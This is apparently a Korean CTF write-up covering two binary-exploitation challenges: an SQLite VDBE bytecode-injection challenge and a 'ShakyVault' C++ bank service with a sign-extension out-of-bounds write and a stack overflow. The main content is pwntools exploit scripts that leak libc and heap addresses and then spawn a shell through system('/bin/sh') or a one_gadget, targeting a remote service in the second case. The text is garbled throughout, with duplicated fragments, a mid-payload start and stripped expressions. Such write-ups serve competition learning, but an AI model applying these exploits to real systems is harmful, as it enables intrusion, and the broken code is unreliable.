payload += p32(0) * 2
payload += p8(0) * 2
payload += p8(1) + p8(0) * 5 # argc = 1
payload += p64(0) # argv *
# FuncDef
payload += p64(0) *3
payload += p64(libc_base + 0x000000000009097f)
payload += b'\x00' * (0x360 - len(payload))
payload += p64(libc_base + libc.sym.system-0x46e) # do_system + 2
Exploit script
OP_Savepoint = 0#
OP_AutoCommit = 1#
OP_Transaction = 2#
OP_Checkpoint = 3#
OP_JournalMode = 4#
OP_Vacuum = 5#
OP_VFilter = 6# /* jump, synopsis: iplan=r[P3] zplan='P4' */
OP_VUpdate = 7# /* synopsis: data=r[P3@P2] */
OP_Init = 8# /* jump, synopsis: Start at P2 */
OP_Goto = 9# /* jump */
OP_Gosub = 10# /* jump */
OP_InitCoroutine = 11# /* jump */
OP_Yield = 12# /* jump */
OP_MustBeInt = 13# /* jump */
OP_Jump = 14# /* jump */
OP_Once = 15# /* jump */
OP_If = 16# /* jump */
OP_IfNot = 17# /* jump */
OP_IsType = 18# /* jump, synopsis: if typeof(P1.P3) in P5 goto P2 */
OP_Not = 19# /* same as TK_NOT, synopsis: r[P2]= !r[P1] */
OP_IfNullRow = 20# /* jump, synopsis: if P1.nullRow then r[P3]=NULL, goto P2 */
OP_SeekLT = 21# /* jump, synopsis: key=r[P3@P4] */
OP_SeekLE = 22# /* jump, synopsis: key=r[P3@P4] */
OP_SeekGE = 23# /* jump, synopsis: key=r[P3@P4] */
OP_SeekGT = 24# /* jump, synopsis: key=r[P3@P4] */
OP_IfNotOpen = 25# /* jump, synopsis: if( !csr[P1] ) goto P2 */
OP_IfNoHope = 26# /* jump, synopsis: key=r[P3@P4] */
OP_NoConflict = 27# /* jump, synopsis: key=r[P3@P4] */
OP_NotFound = 28# /* jump, synopsis: key=r[P3@P4] */
OP_Found = 29# /* jump, synopsis: key=r[P3@P4] */
OP_SeekRowid = 30# /* jump, synopsis: intkey=r[P3] */
OP_NotExists = 31# /* jump, synopsis: intkey=r[P3] */
OP_Last = 32# /* jump */
OP_IfSmaller = 33# /* jump */
OP_SorterSort = 34# /* jump */
OP_Sort = 35# /* jump */
OP_Rewind = 36# /* jump */
OP_SorterNext = 37# /* jump */
OP_Prev = 38# /* jump */
OP_Next = 39# /* jump */
OP_IdxLE = 40# /* jump, synopsis: key=r[P3@P4] */
OP_IdxGT = 41# /* jump, synopsis: key=r[P3@P4] */
OP_IdxLT = 42# /* jump, synopsis: key=r[P3@P4] */
OP_Or = 43# /* same as TK_OR, synopsis: r[P3]=(r[P1] || r[P2]) */
OP_And = 44# /* same as TK_AND, synopsis: r[P3]=(r[P1] && r[P2]) */
OP_IdxGE = 45# /* jump, synopsis: key=r[P3@P4] */
OP_RowSetRead = 46# /* jump, synopsis: r[P3]=rowset(P1) */
OP_RowSetTest = 47# /* jump, synopsis: if r[P3] in rowset(P1) goto P2 */
OP_Program = 48# /* jump */
OP_FkIfZero = 49# /* jump, synopsis: if fkctr[P1]==0 goto P2 */
OP_IsNull = 50# /* jump, same as TK_ISNULL, synopsis: if r[P1]==NULL goto P2 */
OP_NotNull = 51# /* jump, same as TK_NOTNULL, synopsis: if r[P1]!=NULL goto P2 */
OP_Ne = 52# /* jump, same as TK_NE, synopsis: IF r[P3]!=r[P1] */
OP_Eq = 53# /* jump, same as TK_EQ, synopsis: IF r[P3]==r[P1] */
OP_Gt = 54# /* jump, same as TK_GT, synopsis: IF r[P3]>r[P1] */
OP_Le = 55# /* jump, same as TK_LE, synopsis: IF r[P3]<=r[P1] */
OP_Lt = 56# /* jump, same as TK_LT, synopsis: IF r[P3]<r[P1] */
OP_Ge = 57# /* jump, same as TK_GE, synopsis: IF r[P3]>=r[P1] */
OP_ElseEq = 58# /* jump, same as TK_ESCAPE */
OP_IfPos = 59# /* jump, synopsis: if r[P1]>0 then r[P1]-=P3, goto P2 */
OP_IfNotZero = 60# /* jump, synopsis: if r[P1]!=0 then r[P1]--, goto P2 */
OP_DecrJumpZero = 61# /* jump, synopsis: if (--r[P1])==0 goto P2 */
OP_IncrVacuum = 62# /* jump */
OP_VNext = 63# /* jump */
OP_Filter = 64# /* jump, synopsis: if key(P3@P4) not in filter(P1) goto P2 */
OP_PureFunc = 65# /* synopsis: r[P3]=func(r[P2@NP]) */
OP_Function = 66# /* synopsis: r[P3]=func(r[P2@NP]) */
OP_Return = 67#
OP_EndCoroutine = 68#
OP_HaltIfNull = 69# /* synopsis: if r[P3]=null halt */
OP_Halt = 70#
OP_Integer = 71# /* synopsis: r[P2]=P1 */
OP_Int64 = 72# /* synopsis: r[P2]=P4 */
OP_String = 73# /* synopsis: r[P2]='P4' (len=P1) */
OP_BeginSubrtn = 74# /* synopsis: r[P2]=NULL */
OP_Null = 75# /* synopsis: r[P2..P3]=NULL */
OP_SoftNull = 76# /* synopsis: r[P1]=NULL */
OP_Blob = 77# /* synopsis: r[P2]=P4 (len=P1) */
OP_Variable = 78# /* synopsis: r[P2]=parameter(P1,P4) */
OP_Move = 79# /* synopsis: r[P2@P3]=r[P1@P3] */
OP_Copy = 80# /* synopsis: r[P2@P3+1]=r[P1@P3+1] */
OP_SCopy = 81# /* synopsis: r[P2]=r[P1] */
OP_IntCopy = 82# /* synopsis: r[P2]=r[P1] */
OP_FkCheck = 83#
OP_ResultRow = 84# /* synopsis: output=r[P1@P2] */
OP_CollSeq = 85#
OP_AddImm = 86# /* synopsis: r[P1]=r[P1]+P2 */
OP_RealAffinity = 87#
OP_Cast = 88# /* synopsis: affinity(r[P1]) */
OP_Permutation = 89#
OP_Compare = 90# /* synopsis: r[P1@P3] <-> r[P2@P3] */
OP_IsTrue = 91# /* synopsis: r[P2] = coalesce(r[P1]==TRUE,P3) ^ P4 */
OP_ZeroOrNull = 92# /* synopsis: r[P2] = 0 OR NULL */
OP_Offset = 93# /* synopsis: r[P3] = sqlite_offset(P1) */
OP_Column = 94# /* synopsis: r[P3]=PX cursor P1 column P2 */
OP_TypeCheck = 95# /* synopsis: typecheck(r[P1@P2]) */
OP_Affinity = 96# /* synopsis: affinity(r[P1@P2]) */
OP_MakeRecord = 97# /* synopsis: r[P3]=mkrec(r[P1@P2]) */
OP_Count = 98# /* synopsis: r[P2]=count() */
OP_ReadCookie = 99#
OP_SetCookie =100#
OP_ReopenIdx =101# /* synopsis: root=P2 iDb=P3 */
OP_BitAnd =102# /* same as TK_BITAND, synopsis: r[P3]=r[P1]&r[P2] */
OP_BitOr =103# /* same as TK_BITOR, synopsis: r[P3]=r[P1]|r[P2] */
OP_ShiftLeft =104# /* same as TK_LSHIFT, synopsis: r[P3]=r[P2]<<r[P1] */
OP_ShiftRight =105# /* same as TK_RSHIFT, synopsis: r[P3]=r[P2]>>r[P1] */
OP_Add =106# /* same as TK_PLUS, synopsis: r[P3]=r[P1]+r[P2] */
OP_Subtract =107# /* same as TK_MINUS, synopsis: r[P3]=r[P2]-r[P1] */
OP_Multiply =108# /* same as TK_STAR, synopsis: r[P3]=r[P1]*r[P2] */
OP_Divide =109# /* same as TK_SLASH, synopsis: r[P3]=r[P2]/r[P1] */
OP_Remainder =110# /* same as TK_REM, synopsis: r[P3]=r[P2]%r[P1] */
OP_Concat =111# /* same as TK_CONCAT, synopsis: r[P3]=r[P2]+r[P1] */
OP_OpenRead =112# /* synopsis: root=P2 iDb=P3 */
OP_OpenWrite =113# /* synopsis: root=P2 iDb=P3 */
OP_BitNot =114# /* same as TK_BITNOT, synopsis: r[P2]= ~r[P1] */
OP_OpenDup =115#
OP_OpenAutoindex =116# /* synopsis: nColumn=P2 */
OP_String8 =117# /* same as TK_STRING, synopsis: r[P2]='P4' */
OP_OpenEphemeral =118# /* synopsis: nColumn=P2 */
OP_SorterOpen =119#
OP_SequenceTest =120# /* synopsis: if( cursor[P1].ctr++ ) pc = P2 */
OP_OpenPseudo =121# /* synopsis: P3 columns in r[P2] */
OP_Close =122#
OP_ColumnsUsed =123#
OP_SeekScan =124# /* synopsis: Scan-ahead up to P1 rows */
OP_SeekHit =125# /* synopsis: set P2<=seekHit<=P3 */
OP_Sequence =126# /* synopsis: r[P2]=cursor[P1].ctr++ */
OP_NewRowid =127# /* synopsis: r[P2]=rowid */
OP_Insert =128# /* synopsis: intkey=r[P3] data=r[P2] */
OP_RowCell =129#
OP_Delete =130#
OP_ResetCount =131#
OP_SorterCompare =132# /* synopsis: if key(P1)!=trim(r[P3],P4) goto P2 */
OP_SorterData =133# /* synopsis: r[P2]=data */
OP_RowData =134# /* synopsis: r[P2]=data */
OP_Rowid =135# /* synopsis: r[P2]=PX rowid of P1 */
OP_NullRow =136#
OP_SeekEnd =137#
OP_IdxInsert =138# /* synopsis: key=r[P2] */
OP_SorterInsert =139# /* synopsis: key=r[P2] */
OP_IdxDelete =140# /* synopsis: key=r[P2@P3] */
OP_DeferredSeek =141# /* synopsis: Move P3 to P1.rowid if needed */
OP_IdxRowid =142# /* synopsis: r[P2]=rowid */
OP_FinishSeek =143#
OP_Destroy =144#
OP_Clear =145#
OP_ResetSorter =146#
OP_CreateBtree =147# /* synopsis: r[P2]=root iDb=P1 flags=P3 */
OP_SqlExec =148#
OP_ParseSchema =149#
OP_LoadAnalysis =150#
OP_DropTable =151#
OP_DropIndex =152#
OP_Real =153# /* same as TK_FLOAT, synopsis: r[P2]=P4 */
OP_DropTrigger =154#
OP_IntegrityCk =155#
OP_RowSetAdd =156# /* synopsis: rowset(P1)=r[P2] */
OP_Param =157#
OP_FkCounter =158# /* synopsis: fkctr[P1]+=P2 */
OP_MemMax =159# /* synopsis: r[P1]=max(r[P1],r[P2]) */
OP_OffsetLimit =160# /* synopsis: if r[P1]>0 then r[P2]=r[P1]+max(0,r[P3]) else r[P2]=(-1) */
OP_AggInverse =161# /* synopsis: accum=r[P3] inverse(r[P2@P5]) */
OP_AggStep =162# /* synopsis: accum=r[P3] step(r[P2@P5]) */
OP_AggStep1 =163# /* synopsis: accum=r[P3] step(r[P2@P5]) */
OP_AggValue =164# /* synopsis: r[P3]=value N=P2 */
OP_AggFinal =165# /* synopsis: accum=r[P1] N=P2 */
OP_Expire =166#
OP_CursorLock =167#
OP_CursorUnlock =168#
OP_TableLock =169# /* synopsis: iDb=P1 root=P2 write=P3 */
OP_VBegin =170#
OP_VCreate =171#
OP_VDestroy =172#
OP_VOpen =173#
OP_VCheck =174#
OP_VInitIn =175# /* synopsis: r[P2]=ValueList(P1,P3) */
OP_VColumn =176# /* synopsis: r[P3]=vcolumn(P2) */
OP_VRename =177#
OP_Pagecount =178#
OP_MaxPgcnt =179#
OP_ClrSubtype =180# /* synopsis: r[P1].subtype = 0 */
OP_FilterAdd =181# /* synopsis: filter(P1) += key(P3@P4) */
OP_Trace =182#
OP_CursorHint =183#
OP_ReleaseReg =184# /* synopsis: release r[P1@P2] mask P3 */
OP_Noop =185#
OP_Explain =186#
OP_Abortable =187#
OPFLG_JUMP = 0x01# /* jump: P2 holds jmp target */
OPFLG_IN1 = 0x02# /* in1: P1 is an input */
OPFLG_IN2 = 0x04# /* in2: P2 is an input */
OPFLG_IN3 = 0x08# /* in3: P3 is an input */
OPFLG_OUT2 = 0x10# /* out2: P2 is an output */
OPFLG_OUT3 = 0x20# /* out3: P3 is an output */
OPFLG_NCYCLE = 0x40# /* ncycle:Cycles count against P1 */
from pwn import *
sla = lambda x,y : p.sendlineafter(x,y)
p = process('./chal')
e = ELF('./chal')
libc = e.libc
def prepare(idx, stmt):
sla(b'Choice: ',str(1))
sla(b'? ',str(idx))
def compile(opcode, p1 = 0, p2 = 0 , p3 = 0 ,p4 = 0 ,p4_type = 0, p5 = 0):
payload = b''
payload += p8(opcode)
payload += p8(p4_type)
payload += p16(p5)
payload += p32(p1)
payload += p32(p2)
payload += p32(p3)
payload += p64(p4)
return payload
def modify_opcode(idx, vmcode):
sla(b'Choice: ',str(5))
sla(b'? ',str(idx))
p.recvuntil(b'up to ')
c = int(p.recvuntil(b')')[:-1],10)
sla(b'? ',str(len(vmcode)))
assert c%0x18 == 0
def exec_q(idx):
sla(b'Choice: ',str(2))
sla(b'? ',str(idx))
payload = b'SELECT '
for i in range(0x20):
payload += f'(SELECT {i}),'.encode()
payload = payload[:-1]
pc = 1
payload = compile(OP_Init, 0, pc) # jmp to pc
payload += compile(OP_Integer,0x1, 1)
payload += compile(OP_IntCopy, (-146)&0xffffffff, 1)
payload += compile(OP_ResultRow, 1, 1) # p2 = col count
payload += compile(OP_Halt)
modify_opcode(1, payload)
libc_base = int(p.recvuntil(b' ')[:-1]) - 0x21ace0
OP_SCopy = 81# /* synopsis: r[P2]=r[P1] */
OP_IntCopy = 82# /* synopsis: r[P2]=r[P1] */
payload = compile(OP_Init, 0, pc) # jmp to pc
payload += compile(OP_Integer,0x1, 1)
payload += compile(OP_IntCopy, (-0xb8)&0xffffffff, 1)
payload += compile(OP_ResultRow, 1, 1) # p2 = col count
payload += compile(OP_Halt)
modify_opcode(1, payload)
heap_base = int(p.recvuntil(b' ')[:-1])-0x14578
mem_start = heap_base + 0x16e28
payload_start = heap_base + 0x36b8
# sqlite3_context
payload = b'' # scopy 0x18
payload += p64(mem_start + 0x0) # Mem * pOut <- Mem[0] address, p3 must be 0
payload += p64(payload_start+0x38) # FuncDef *pFunc
payload += p64(payload_start + 0x18) # /bin/sh
payload += b'/bin/sh\x00'
payload += p32(0) * 2
payload += p8(0) * 2
payload += p8(1) + p8(0) * 5 # argc = 1
payload += p64(0) # argv *
# FuncDef
payload += p64(0) *3
payload += p64(libc_base + 0x000000000009097f)
payload += b'\x00' * (0x360 - len(payload))
payload += p64(libc_base + libc.sym.system-0x46e) # do_system + 2
# 0x000000000009097f : mov rdi, qword ptr [rdi + 0x10] ; call qword ptr [rax + 0x360]
hexp = ''
for i in payload:
hexp += hex(i)[2:].rjust(2,'0')
prepare(2, f"SELECT x'{hexp}'".encode())
payload = compile(OP_Init, 0, pc) # jmp to pc
payload += compile(OP_PureFunc, p4 = payload_start, p3 = 0)
payload += compile(OP_Halt)
modify_opcode(1, payload)
대회 기간에 풀었던 문제이다.
#include <cstring>
#include <iostream>
#include <thread>
#include <cstdio>
struct Account {
char id;
bool active;
char* name;
uint64_t balance;
void submit_support_ticket(char* _name, char* _content) {
// stub
char* separator;
char* debug_log;
Account* accounts;
char id_counter = 0;
size_t account_count = 0;
void interface() {
while(true) {
printf("Welcome to the ShakyVault Bank Interface\n");
printf("1) Create new Account\n");
printf("2) Show an Account\n");
printf("3) Create a Transaction\n");
printf("4) Deactivate an Account\n");
printf("5) Create a support ticket\n");
printf("6) Exit\n");
printf("> ");
const int selection = fgetc(stdin) - static_cast<int>('0');
switch (selection) {
case 1: {
if (account_count >= 255) {
printf("We've unfortunately run out of accounts. Please try again later.");
printf("Account Name: ");
char* account_name = new char[80];
std::cin.getline(account_name, 80);
for (size_t i = 0; i < 80; i++) {
if (account_name[i] == '\n') {
account_name[i] = '\0';
account_name[79] = '\0';
accounts[account_count].id = id_counter++;
accounts[account_count].active = true;
accounts[account_count].name = account_name;
accounts[account_count].balance = 35;
printf("Account created. Your id is %d\n", accounts[account_count++].id);
printf("We have granted you a $35 starting bonus.\n");
case 2: {
printf("Which id do you want to read? ");
size_t number;
std::cin >> number;
if ( {
printf("Invalid Input.");
if (number >= account_count) {
printf("That account does not exist.");
const Account acc = accounts[number];
printf("Id: %d\n",;
printf("Name: %s\n",;
printf("Active: %s\n", ? "true" : "false");
printf("Balance: %lu\n", acc.balance);
case 3: {
printf("Which account do you want to transfer from? ");
size_t id_from;
std::cin >> id_from;
if ( {
printf("Invalid Input.");
printf("Which account do you want to transfer to? ");
size_t id_to;
std::cin >> id_to;
if ( {
printf("Invalid Input.");
if (id_from >= account_count || id_to >= account_count) {
printf("Invalid account id\n");
printf("How much money do you want to transfer? ");
uint64_t amount;
std::cin >> amount;
if ( {
printf("Invalid Input.");
const Account from = accounts[id_from];
const Account to = accounts[id_to];
if (from.balance < amount) {
printf("You don't have enough money for that.");
if (! || ! {
printf("That account is not active.");
accounts[].balance -= amount;
accounts[].balance += amount;
printf("Transaction created!\n");
case 4: {
printf("Which account do you want to disable? ");
size_t number;
std::cin >> number;
if ( {
printf("Invalid Input.");
if (number >= account_count) {
printf("That account does not exist.");
accounts[number].active = false;
case 5: {
printf("Which account does this issue concern? ");
size_t number;
std::cin >> number;
if ( {
printf("Invalid Input.");
Account acc = accounts[number];
char name[40] = "Support ticket from ";
char* content = new char[1000];
printf("Please describe your issue (1000 charaters): ");
std::cin.getline(content, 1000);
if ( {
printf("Invalid Input.");
char* name_ptr = name + strlen(name);
name_ptr += strlen(;
*name_ptr = '\0';
submit_support_ticket(name, content);
printf("Thanks! Our support technicians will help you shortly.\n");
delete[] content;
case 6: {
default: {
printf("Invalid option %d\n\n\n", selection);
int main() {
setbuf(stdout, nullptr);
separator = new char[128];
debug_log = new char[2900];
accounts = new Account[256];
strcpy(debug_log, "TODO");
for (int i = 0; i < 126; i++) separator[i] = '_';
separator[126] = '\n';
separator[127] = '\0';
delete[] separator;
delete[] debug_log;
delete[] accounts;
return 0;
Create Transaction이 실행될때 두번의 참조가 일어나게 된다.
id는 char이므로 sign extension이 일어나서 oob write가 가능하다.
accounts[].balance -= amount;
accounts[].balance += amount;
그리고 아래에서 stack bof가 터진다.
char* name_ptr = name + strlen(name);
name_ptr += strlen(;
*name_ptr = '\0';
Exploit script
from pwn import *
from tqdm import tqdm
sla = lambda x,y : p.sendlineafter(x,y)
sa = lambda x,y : p.sendafter(x,y)
# p = process('./vuln')
p = remote('',10001)
# p = remote('localhost',1024)
# libc = ELF('/usr/lib/x86_64-linux-gnu/')
libc = ELF('./')
# context.log_level='debug'
for i in tqdm(range(134)):
def transfer(fr,to,amount):
assert amount >0
sla(b'transfer? ',str(amount))
for i in tqdm(range(0x34)):
for i in tqdm(range(0x34)):
for i in tqdm(range(123)):
# 0x5f5f5f -> 0x7025 -> %p
libc_base = int(b'0x'+p.recvuntil(b'_')[:-1],16) - libc.sym.write -20
# 0xe5306 , 0x4497f , 0x449d3
payload = b'A'*(0x44)+p64(libc_base+0xe5306)
sla(b'? ',b'134')
sla(b': ',b'asdf')
# OoB Add/Sub
# Stack Bof
# OoB copy
# Heap OoB Add/Sub